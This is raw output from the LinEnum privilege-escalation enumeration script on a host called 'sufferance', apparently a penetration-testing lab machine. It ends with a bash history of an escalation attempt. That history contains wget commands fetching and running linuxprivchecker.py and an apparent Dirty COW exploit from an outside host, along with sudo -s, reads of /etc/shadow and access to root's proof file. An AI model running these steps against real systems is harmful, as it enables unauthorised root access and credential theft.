- bob@sufferance:/tmp$ bash linenum.sh
- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- # version 0.91
- [-] Debug Info
- [+] Thorough tests = Disabled (SUID/GUID checks will not be performed!)
- Scan started at:
- Wed Aug 8 03:55:57 EDT 2018
- ### SYSTEM ##############################################
- [-] Kernel information:
- Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
- [-] Kernel information (continued):
- Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
- [-] Hostname:
- sufferance
- ### USER/GROUP ##########################################
- [-] Current user/group info:
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Users that have previously logged onto the system:
- Username Port From Latest
- root tty1 Thu Jun 9 07:30:24 -0400 2016
- bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
- [-] Who else is logged on:
- 03:55:57 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bob pts/0 10.11.0.86 03:14 37:01m 0.00s 0.00s -bash
- bob pts/1 10.11.0.86 03:21 2.00s 0.03s 0.02s bash linenum.sh
- [-] Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
- uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
- uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
- uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Contents of /etc/passwd:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- Debian-exim:x:100:102::/var/spool/exim4:/bin/false
- statd:x:101:65534::/var/lib/nfs:/bin/false
- identd:x:102:65534::/var/run/identd:/bin/false
- sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
- bob:x:1001:1001::/home/bob:/bin/bash
- [-] Super user account(s):
- root
- [+] We can sudo without supplying a password!
- usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
- { -e file [...] | -i | -s | <command> }
- [+] We can read root's home directory!
- total 36K
- drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
- -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
- -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
- -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
- ---------- 1 root root 33 2015-02-27 19:33 proof.txt
- drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
- -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
- [-] Are permissions on /home directories lax:
- total 12K
- drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
- [-] Root is allowed to login via SSH:
- PermitRootLogin yes
- ### ENVIRONMENTAL #######################################
- [-] Environment information:
- SHELL=/bin/bash
- TERM=xterm-256color
- SSH_CLIENT=10.11.0.86 44278 22
- SSH_TTY=/dev/pts/1
- USER=bob
- PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
- MAIL=/var/mail/bob
- PWD=/tmp
- LANG=en_US.UTF-8
- HOME=/home/bob
- SHLVL=2
- LOGNAME=bob
- SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
- _=/usr/bin/env
- [-] Path information:
- /usr/local/bin:/usr/bin:/bin:/usr/games
- [-] Available shells:
- # /etc/shells: valid login shells
- /bin/csh
- /bin/sh
- /usr/bin/es
- /usr/bin/ksh
- /bin/ksh
- /usr/bin/rc
- /usr/bin/tcsh
- /bin/tcsh
- /usr/bin/esh
- /bin/bash
- /bin/rbash
- [-] Current umask value:
- u=rwx,g=rx,o=rx
- 0022
- [-] Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ### JOBS/TASKS ##########################################
- [-] Cron jobs:
- -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
- /etc/cron.d:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.daily:
- total 56
- drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
- -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
- -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
- -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
- -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
- -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
- -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
- -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
- -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.monthly:
- total 16
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
- /etc/cron.weekly:
- total 20
- drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
- [-] Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- ### NETWORKING ##########################################
- [-] Network and IP info:
- eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
- inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
- inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:81845 errors:2 dropped:4 overruns:0 frame:0
- TX packets:27849 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:7177303 (6.8 MiB) TX bytes:4947482 (4.7 MiB)
- Interrupt:18 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:18 errors:0 dropped:0 overruns:0 frame:0
- TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
- [-] Nameserver(s):
- nameserver 10.11.1.220
- nameserver 10.11.1.221
- [-] Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
- tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 2396 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
- tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
- [-] Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.11.1.136:137 0.0.0.0:* -
- udp 0 0 0.0.0.0:137 0.0.0.0:* -
- udp 0 0 10.11.1.136:138 0.0.0.0:* -
- udp 0 0 0.0.0.0:138 0.0.0.0:* -
- ### SERVICES #############################################
- [-] Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
- root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
- root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
- root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
- root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
- root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
- root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
- root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
- root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
- root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
- root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
- root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
- root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
- root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
- root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
- bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
- root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
- root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
- root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
- root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
- root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
- root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
- bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
- bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
- root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
- root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
- root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
- root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
- root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
- root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
- root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
- root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
- root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
- bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
- bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
- 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
- root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
- root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
- root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
- root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
- root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
- root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
- root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
- root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
- daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
- root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
- root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
- root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
- root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
- root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
- root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
- root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
- bob 2104 1.0 0.1 4568 1872 pts/1 S+ 03:55 0:00 bash linenum.sh
- bob 2105 1.0 0.1 4584 1508 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2107 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
- bob 2286 0.0 0.1 4584 1272 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2287 0.0 0.0 3424 984 pts/1 R+ 03:55 0:00 ps aux
- [-] Process binaries and associated permissions (from above list):
- 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
- 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
- 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
- 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
- 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
- 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
- 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
- 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
- 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
- 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
- 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
- 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
- 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
- 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
- [-] Contents of /etc/inetd.conf:
- # /etc/inetd.conf: see inetd(8) for further informations.
- #
- # Internet superserver configuration database
- #
- #
- # Lines starting with "#:LABEL:" or "#<off>#" should not
- # be changed unless you know what you are doing!
- #
- # If you want to disable an entry so it isn't touched during
- # package updates just comment it out with a single '#' character.
- #
- # Packages should modify this file by using update-inetd(8)
- #
- # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
- #
- #:INTERNAL: Internal services
- #discard stream tcp nowait root internal
- #discard dgram udp wait root internal
- #daytime stream tcp nowait root internal
- #time stream tcp nowait root internal
- #:STANDARD: These are standard services.
- #:BSD: Shell, login, exec and talk are BSD protocols.
- #:MAIL: Mail, news and uucp services.
- #:INFO: Info services
- ident stream tcp wait identd /usr/sbin/identd identd
- #:BOOT: TFTP service is provided primarily for booting. Most sites
- # run this only on machines acting as "boot servers."
- #:RPC: RPC based services
- #:HAM-RADIO: amateur-radio services
- #:OTHER: Other services
- #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
- [-] The related inetd binary permissions:
- -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
- [-] /etc/init.d/ binary permissions:
- total 332
- drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
- -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
- -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
- -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
- -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
- -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
- -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
- -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
- -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
- -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
- -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
- -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
- -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
- -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
- -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
- -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
- -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
- -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
- -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
- -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
- -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
- -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
- -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
- -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
- -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
- -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
- -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
- -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
- -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
- -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
- -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
- -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
- -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
- -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
- -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
- -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
- -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
- -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
- -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
- -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
- -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
- -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
- -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
- -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
- -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
- -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
- -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
- -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
- -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
- -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
- -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
- -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
- -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
- -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
- -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
- -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
- -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
- -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
- -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
- -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
- ### SOFTWARE #############################################
- [-] Sudo version:
- Sudo version 1.6.8p12
- ### INTERESTING FILES ####################################
- [-] Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/gcc
- [-] Installed compilers:
- ii gcc 4.1.1-15 The GNU C compiler
- ii gcc-4.1 4.1.1-21 The GNU C compiler
- [-] Can we read/write sensitive files:
- -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
- -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
- -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
- -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
- [-] NFS config details:
- -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
- [-] Can't search *.conf files as no keyword was entered
- [-] Can't search *.php files as no keyword was entered
- [-] Can't search *.log files as no keyword was entered
- [-] Can't search *.ini files as no keyword was entered
- [-] All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
- -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
- -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
- -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
- -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
- -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
- -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
- -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
- -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
- -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
- -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
- -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
- -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
- -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
- -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
- -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
- -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
- -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
- -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
- -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
- [-] Current user's history files:
- -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
- [+] Root's history files are accessible!
- -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
- [-] Location and contents (if accessible) of .bash_history file(s):
- /home/bob/.bash_history
- exit
- exit
- exit
- ls
- cd ..
- ls
- cd ..
- ls
- cd usr
- ls
- cd bin
- ls
- ls
- cd ..
- ls
- cd ..
- ls
- cd var
- ls
- cd bak
- cd backups/
- ls
- cd ..
- ls
- cd /
- find . -exec file {} \; | grep -i elf
- /bin/sh -i
- ls
- id
- /bin/bash
- ls -l
- strings
- strings vmlinuz
- ls
- cd sbin
- ls
- ls -l
- cd ..
- ls
- cd home
- cd bob
- ls
- cd files
- ls
- cat *
- cd ..
- cd ..
- cd ..
- cd tmp
- ls
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.0.86:8000/linuxprivchecker.py
- python linuxprivchecker.py
- /bin/su
- /usr/bin
- ls
- cd /usr/bin
- ls
- strings at
- strings at
- strings at
- wget http://10.11.0.86:8000/dcow.c
- cd /tmp
- wget http://10.11.0.86:8000/dcow.c
- chmod +x dcow.c
- ./dcow.c
- id
- euid
- ps
- ps -eo pid,user,uid,args
- ps -eo pid,euid | grep YOUR_PID_HERE
- ps
- ps -eo pid,euid | grep 3623
- ps -eo pid,euid | grep 3620
- seteuid(0)
- ps -eo pid,euid | grep 3620
- ./dcow.c
- ./dcow.c
- ./dcow.c
- ./dcow.c
- $PATH
- echo $PATH
- echo $SHELL
- find / -perm -u=s -type f 2>/dev/null
- $PATH=/bin/su
- set $PATH = /bin/su
- echo $PATH
- export PATH="$PATH:/bin/su"
- echo $PATH
- whoami
- id
- ps
- /bin/bash
- ls
- id
- echo $PATH
- ps
- ps -eo pid,euid,ruid,suid | grep 375
- ps -eo pid,euid,ruid,suid | grep 677
- ps -eo pid,euid,ruid,suid | grep 3623
- ps -eo pid,euid,ruid,suid | grep 372
- sudo su
- /bin/su
- /bin.su
- /bin/h
- /bin/sh
- ls
- id
- whoami
- ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
- ls
- ls -l
- cd vmware-root/
- ls
- strings vmware-root/
- /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
- cd /usr/lib/vmware-tools/bin32/
- ls
- ls -l
- strings vmware-user-suid-wrapper
- chmod +x vmware-user-suid-wrapper
- ./vmware-user-suid-wrapper
- id
- whoami
- uid
- id
- sudo -l
- sudo -s
- ls
- cd files
- ls
- cd ~
- ls
- cd ..
- cd ..
- ls
- cd home
- ls
- cd .ssh
- cd bob
- cd .ssj
- cd .ssh
- ls
- cat authorized_keys
- cd ..
- cd ..
- ls
- cd ..
- ls
- cat /etc/passwd
- cat /etc/shadow
- cd root
- ls
- cat proof.txt
- uname -a
- setuid id
- setuid
- setid
- access
